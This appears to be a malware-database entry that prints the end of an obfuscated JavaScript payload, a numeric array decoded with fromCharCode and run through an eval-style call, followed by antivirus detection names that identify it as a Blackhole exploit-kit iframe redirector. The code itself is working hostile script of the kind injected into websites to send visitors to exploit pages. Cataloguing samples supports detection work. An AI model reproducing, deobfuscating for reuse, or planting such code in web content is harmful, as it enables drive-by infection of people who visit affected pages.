... 3220 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.106
- Avast
- JS:Iframe-ZR [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Agent.IJB
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.IJB (B)
- Comodo
- TrojWare.JS.Agent.IR
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.LR
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Prot
- JS/IFrame.RS
- AVG
- HTML/Framer
- Norman
- Agent.AMAYB
- GData
- Trojan.JS.Agent.IJB
- Commtouch
- JS/IFrame.RS
- BitDefender
- Trojan.JS.Agent.IJB
|